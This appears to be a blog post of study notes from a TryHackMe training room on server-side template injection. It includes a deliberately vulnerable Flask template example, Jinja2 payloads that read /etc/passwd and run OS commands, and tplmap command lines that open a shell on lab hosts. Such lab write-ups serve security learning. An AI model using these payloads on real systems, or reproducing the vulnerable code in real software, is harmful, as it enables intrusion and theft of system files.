Disclaimer!!!
The information provided in this blog is to be used for educational purposes only. All of the information in this blog is meant to help the reader to develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage. Hacking is a crime and I am not responsible for the way you use it.
Hello hackers! Today we are going to look at ZTH room on TryHackMe. This is not going to be a usual walkthrough but I will rather paste here my notes from the room. So enough talk and let’s get to it.
SSTI
SSTI: Server Side Template Injection is when a user is able to pass in a parameter that can control the template engine that is running on the server. You can test for SSTI using {{2+2}} as a test
A template engine allows developers to use static HTML pages with dynamic elements. Take for instance a static profile.html page, a template engine would allow a developer to set a username parameter, that would always be set to the current user’s username
Example code: it allows a hacker to inject template code into the website
template = """
<!DOCTYPE html><html><body>\
<form action="/" method="post">\
First name:<br>\
<input type="text" name="name" value="">\
<input type="submit" value="submit">\
</form><h2>Hello %s! </h2></body></html>""" % user_input
return render_template_string(template)
Testing for SSTI using basic test {{2+2}}:
If the problem is calculated -> vulnerable to SSTI
Further exploitation: PayloadsAllTheThings (https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection)
We can read remote files using LFI:
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}We can also execute commands using subprocess.Popen:
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
Automatic exploitation:
tplmap.py – exploitation of SSTI to get access to the underlying OS
Syntax: basic syntax for tplmap is different depending on whether you are using GET or POST
Tplmap not only exploits the vulnerabilities of file systems, but also has the capability of accessing the underlying operating system using different parameters. The following screenshot displays different parameter options that can be used in order to access the underlying operating system:
Example: How to cat /etc/passwd on 10.10.10.10:5000 with vulnerable parameter noot
./tplmap.py -u http://10.10.10.10:5000/ -d 'noot' --os-cmd "cat/etc/passwd"Example: How to get remote shell on 10.10.60.177:80 with vulnerable parameter name
./tplmap.py -u http://10.10.60.177/ -d 'name' --os-shell
Installing tplmap
I’m also appending HOWTO on installing tplmap cause I know from my own experience that it might get frustrating if you are not familiar with python, pip etc…
You can download tplmap from github:
After it’s downloaded, cd to tplmap/ directory:
You need to install requirements:
If you are following me, you will get the following errors:
And it will also complain about some wsgiref dependency:
And when you try to run the program:
The main problem is that tplmap.py is written in Python version 2. It means that dependencies must be also installed for version 2. So you need to use pip2 instead of pip3.
So download pip2 from https://bootstrap.pypa.io/pip/2.7/get-pip.py:
After the get-pip.py is downloaded, run it using Python version 2:
As you can see, pip2 is installed after that. For me, it’s installed in /home/adametim/.local/bin/ directory which is not in $PATH variable. It basically means that you cannot run pip2 just by using its name, but you have to specify full path to pip2. So if we want to install requirements of tplmap, we need to do it in a following way in my case:
The installation of requirements should successfully complete:
After that, you can fire up tplmap.py script.
That’s it for this part. Thank you for reading this and see you at the next blog post!
All credits go to Paradox (https://tryhackme.com/p/Paradox) who has created this excellent room. You can find it at https://tryhackme.com/room/zthobscurewebvulns